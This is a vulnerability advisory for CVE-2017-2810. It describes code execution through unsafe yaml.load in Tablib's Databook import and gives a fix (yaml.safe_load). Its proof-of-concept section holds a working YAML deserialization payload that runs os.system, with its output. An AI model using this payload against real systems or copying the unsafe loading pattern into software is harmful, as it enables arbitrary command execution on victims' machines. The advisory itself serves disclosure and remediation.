Tablib Yaml Load Code Execution Vulnerability(CVE-2017-2810)

### Summary An exploitable vulnerability exists in the Databook loading functionality of Tablib. A yaml loaded Databook can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability. ### Tested Versions Tablib v0.11.4 ### Product URLs https://pypi.python.org/pypi/tablib ### CVSSv3 Score 7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H ### CWE CWE-502 - Deserialization of Untrusted Data ### Details Tablib is a Python dataset library used to agnostically generate various tabular formats from data. Tablib is also the main driver behind django-import-export application and library. ``` tablib/formats/_yaml.py:31 def import_book(dbook, in_stream): """Returns databook from YAML stream.""" dbook.wipe() for sheet in yaml.load(in_stream): [0] data = tablib.Dataset() data.title = sheet['title'] data.dict = sheet['data'] dbook.add_sheet(data) ``` Tablib is leveraging the unsafe API `yaml.load` [0] for importing the current yaml stream into to Databook.. This yaml can contain a python directive to execute arbitrary commands. ### Exploit Proof-of-Concept A test leveraging the Tablib API shows the commands being executed: ``` (tablib) user in ~ In [1]: import tablib In [2]: databook = tablib.Databook() In [3]: databook.load('yaml', '!!python/object/apply:os.system ["ls"]') AUTHORS HISTORY.rst MANIFEST.in NOTICE build docs tablib test_tablib.py HACKING LICENSE Makefile README.rst dist setup.py tablib.egg-info tox.ini ``` ### Mitigation Replace `yaml.load` with `yaml.safe_load` ### Timeline * 2017-04-18 - Vendor Disclosure * 2017-06-13 - Public Release ### CREDIT Discovered by Cory Duplantis of Cisco Talos.